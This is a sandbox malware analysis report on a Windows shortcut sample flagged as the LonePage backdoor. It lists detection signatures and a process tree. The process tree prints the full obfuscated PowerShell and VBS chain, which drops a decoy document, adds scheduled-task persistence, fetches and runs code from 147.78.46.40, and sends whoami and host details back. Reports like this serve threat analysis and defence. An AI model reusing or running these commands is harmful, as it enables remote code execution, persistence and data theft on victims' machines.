Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XA5hQdlKVd.lnk

Overview

General Information

Sample name:XA5hQdlKVd.lnk
renamed because original name is a hash value
Original sample name:0acd4a9ef18f3fd1ccf440879e768089d4dd2107e1ce19d2a17a59ebed8c7f5d.lnk
Analysis ID:1522686
MD5:4e37f3bbf59b456fb07dc71f3fc20dba
SHA1:816ade8789655d00cc33d290a7d8f8c3321f80c0
SHA256:0acd4a9ef18f3fd1ccf440879e768089d4dd2107e1ce19d2a17a59ebed8c7f5d
Tags:lnkUAC-0099user-JAMESWT_MHT
Infos:

Detection

LonePage
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Potential dropper URLs found in powershell memory
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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';$fil=[System.Convert]::FromBase64String($temp);set-content $home\appdata\local\temp\Return.docx -value $fil -encoding byte;&$home\appdata\local\temp\Return.docx;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCmMgPSAicG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXcgaGlkZGVuIC1ub3Byb2ZpbGUgLWMgJGlpaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cDovLzE0Ny43OC40Ni40MDozNzY2Mi94c1NwUWJTT0dIeXpNTHhaL3BhZ2UxNjQvdXBncmFkZS50eHQnKTtpZigkZmxtLkxlbmd0aCAtZ3QgMSl7JGprcj1bc3lzdGVtLnRleHQuZW5jb2RpbmddOjp1dGY4LmdldFN0cmluZygkZmxtKTtpZigkamtyIC1tYXRjaCAnZ2V0LWNvbnRlbnQnKXtbYnl0ZVtdXSAkZHJweT1JRVggJGprcjt9ZWxzZXskYmpkbz13aG9hbWk7JGJqZG8rPSc9PSc7JGJqZG8rPVtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoJGlwKStbU3lzdGVtLkVudmlyb25tZW50XTo6TmV3TGluZTskYmpkbys9SUVYICRqa3J8b3V0LXN0cmluZztbYnl0ZVtdXSRkcnB5PVtzeXN0ZW0udGV4dC5lbmNvZGluZ106OlV0ZjguR2V0Qnl0ZXMoJGJqZG8pO307JHVqaz1uZXctb2JqZWN0IG5ldC53ZWJjbGllbnQ7JHVqay51cGxvYWRkYXRhKCdodHRwOi8vMTQ3Ljc4LjQ2LjQwOjQzODkxL3BhZ2UxNjQnLCRkcnB5KTt9Ig0Kci5SdW4gYywgMCwgZmFsc2UNCg0KDQo=';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WINWORD.EXE (PID: 4368 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\appdata\local\temp\Return.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • schtasks.exe (PID: 3404 cmdline: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • wscript.exe (PID: 1056 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3380 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5200 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\Libraries.vbsJoeSecurity_LonePageYara detected LonePageJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.2442208931.0000026E1AF45000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
      00000007.00000002.2442050583.0000026E1AE28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
        00000007.00000002.2442050583.0000026E1AE8D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
          0000000E.00000002.2976704530.0000020A282B0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
            00000000.00000002.2370858356.0000023E33DA2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
              Click to see the 9 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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